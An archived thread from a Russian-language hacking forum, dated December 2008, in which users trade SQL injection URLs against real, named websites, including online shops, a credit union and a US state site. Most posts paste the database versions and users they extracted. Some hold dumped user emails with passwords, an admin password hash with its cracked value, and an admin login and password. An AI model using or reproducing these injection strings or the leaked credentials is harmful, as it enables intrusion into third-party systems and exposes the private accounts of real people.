ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7141  
Старый 19.12.2008, 23:34
0xA1isa
Новичок
Регистрация: 19.06.2007
Сообщений: 8
Провел на форуме:
218478

Репутация: 23
По умолчанию

http://www.jurnal.org/articles.php?rub=ekon'+union+select+1,2,version(), user(),5,6+limit+160,100/*



http://www.top-manager.ru/?a=1&id=-1+union+select+version(),concat_ws(0x0a,login,pass wd),3,4,user(),6,7,8+from+users+limit+0,1/*

http://www.top-manager.ru/?a=1&id=-1+union+select+version(),concat_ws(0x0a,username,p asswd),3,4,user(),6,7,8+from+adm+limit+0,1/*

tm mw3p2dfv
 
Ответить с цитированием

  #7142  
Старый 20.12.2008, 00:49
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633

Репутация: 155
По умолчанию

http://www.arconline.co.uk/news-story.php?id=-1+union+select+1,load_file(0x2f6574632f70617373776 4),3,4,5,6,7,8,9--
http://www.arconline.co.uk/news-story.php?id=-1+union+select+1,unhex(hex(group_concat(table_name ))),3,4,5,6,7,8,9+from+information_schema.tables--
http://www.arconline.co.uk/news-story.php?id=-1+union+select+1,unhex(hex(group_concat(column_nam e))),3,4,5,6,7,8,9+from+information_schema.columns +where+table_name=0x3132616c6c5f61646d696e--
 
Ответить с цитированием

  #7143  
Старый 20.12.2008, 00:57
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Пробежались по магазинам!

http://mediacomp.ru/?action=sub_kat&top_kat=-2+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT( 0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Da tabase(),0x2F2A2A2F,User(),0x7873716C696E6A656E64) ,0x71),0x71)/*

Database Version: 4.1.18-standard
Database name: db_mediacomp
User name: mediacomp@localhost


http://www.stereophones.ru/comments.php?id=123+union+select+1,2,concat_ws(0x3 a3a,version(),user(),database()),4,5--&model_name=Yamaha%20RH5MA


version:5.0.67-log
user:u45585@10.10.153.188
database:u45585


Getting Data from table mail (493 Rows) from database u45585
Fields email:status:idass

[1]:schelin@rol.ru:0:5:9kSA4wHn
[2]:dimik@dimik.ru:0:15:4FfNS]D?M
[3]:zed-dead@inbox.ru:1:6:Y3dD]oUq
[4]:Leon@dti.iks.ru:1:7:i?uNNF;Yb
[5]:konovalenkoe@list.ru:1:8:h_`_6Q1T
[6]:e-stat@mail.ru:1:9:P7?5CFUPa
[7]:serbv1@rambler.ru:0:10:ZmQtGW
[8]:eros433@ztel.ru:1:11:yCdW_>];
[9]:mvv@metib.ru:1:12:are2@k
[10]:maxx@mks.ua:1:13:C7t^pBm
[11]:ib1969@mail.ru:1:14:Y1^fq5g7g
[12]:lie777@list.ru:1:16:vUJBWZa_l
 
Ответить с цитированием

  #7144  
Старый 20.12.2008, 09:55
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

State.hi.us - пр 7
Цитата:
http://www.state.hi.us/sfca/artmuseum.php?article_id=-25+union+select+1,2,3,4,5,6,7,version(),9,10/*
xyz разкрутиш )
 
Ответить с цитированием

  #7145  
Старый 20.12.2008, 17:00
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://elftor.com/elftor.php?number=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
Код:
http://www.frutonyanya.ru/php/news.php?n=25&c=-49+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
хз, подобрал точно, но ничего не выводится о_О
 
Ответить с цитированием

  #7146  
Старый 20.12.2008, 17:05
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Всё там выводится:

Db Version: 4.1.22-log
Db name: frutony3_fn
UserName: frutony3_fn@localhost
 
Ответить с цитированием

  #7147  
Старый 21.12.2008, 11:45
-=Razor=-
Новичок
Регистрация: 20.12.2008
Сообщений: 24
Провел на форуме:
1187799

Репутация: 62
По умолчанию

PHP код:
http://www.thisspartanlife.com/index.php?id=-999+union+select+1,concat_ws(char(32,45,32),%20version(),user(),database()),3,4-- 
5.0.67-community - tsl_admin@localhost - tsl_admin

ТИЦ:30
PR:5

======

PHP код:
http://www.mmdb.ru/index.php?action=perf_by_genre&id_genre=-1033+union+select+1,version()/* 
Version: 4.1.22-log
database: wwwmmdbusersru
user: mmdb@localhost


ТИЦ:40
PR: 5

======

PHP код:
http://www.parisbeaute.ua/articles/article.phtml?id=-7'+union+select+concat_ws(char(32,45,32),%20version(),user(),database()),2,3,4/* 
4.1.22 - u_parisbeaut@localhost - parisbeaute

ТИЦ: 30
PR: 2
======
 
Ответить с цитированием

  #7148  
Старый 21.12.2008, 18:19
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

http://www.belexpo.by/ru/news/2008/12/11/125.html?template=20+UNION+SELECT+1,2,AES_DECRYPT( AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Vers ion(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x78 73716C696E6A656E64),0x71),0x71),4,5--

Database Version: 4.1.16-max
Database name: belexpo
User name: belexpo@localhost


http://www.lekar.by/press/articles/23.html?template=20+union+select+1,2,concat_ws(0x3 a3a,version(),user(),database()),table_name,5+from +information_schema.tables+limit+40,100--

5.0.67-community
lekarby_cms@localhost
lekarby_cms
name не смог вытянуть может подскажете как
email admin@lekar.by
password 4722c00d0d47009e пароль : 1976
 
Ответить с цитированием

  #7149  
Старый 22.12.2008, 00:20
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

Кредитная организация.

www.iccreditunion.org

Цитата:
http://www.iccreditunion.org/news/index.php?id=-53+union+select+1,concat_ws(0x3A3a,version(),datab ase(),user()),3,4,5/*
4.1.22-standard
iccredit_icdb
iccredit_ensky@localhost
 
Ответить с цитированием

  #7150  
Старый 22.12.2008, 04:00
hackmen
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447

Репутация: 123
По умолчанию

Цитата:
PHP код:
http://www.thisspartanlife.com/index.php?id=-999+union+select+1,concat_ws(char(32,45,32),%20ver sion(),user(),database()),3,4--


5.0.67-community - tsl_admin@localhost - tsl_admin

ТИЦ:30
PR:5
http://www.thisspartanlife.com/admin/

Adminname: Damian
Password: admin
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ